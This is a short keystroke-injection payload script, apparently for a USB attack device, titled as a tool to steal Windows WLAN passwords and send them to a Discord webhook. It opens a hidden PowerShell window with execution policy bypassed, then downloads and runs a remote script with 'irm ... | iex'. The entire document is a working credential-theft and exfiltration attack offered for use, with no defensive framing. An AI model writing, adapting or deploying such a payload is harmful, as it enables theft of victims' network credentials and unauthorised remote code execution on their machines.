* ###################################################################
* #                                                                 |
* # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
* # Author       : Aleff                                            |
* # Description: A script used to stole target WLAN Passwords.      |
* # Category     : Credentials                                      |
* # Target       : Windows 10-11                                    |
* # Version      : 1.0                                              |
* #                                                                 |
* ###################################################################



DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='

* REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
STRING DISCORD

* Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
STRING ';irm PAYLOAD | iex
ENTER
